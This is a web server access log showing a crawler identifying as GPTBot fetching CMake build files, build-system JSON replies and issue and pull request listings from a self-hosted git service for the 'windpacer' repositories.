+[17/Feb/2026:19:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11953] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211048] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?state=closed&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:19:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:19:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:50:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:19:50:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:50:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 9857] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:50:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:50:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11374] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:50:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=source" [Client 74.7.227.38] [Length 13131] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:19:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10139] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10143] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10143] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +[17/Feb/2026:19:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11629] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11628] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=source" [Client 74.7.227.38] [Length 14835] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11628] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11128] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11629] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=source" [Client 74.7.227.38] [Length 14834] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11630] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11629] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11599] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11629] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=source" [Client 74.7.227.38] [Length 14806] [Gzip 5.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 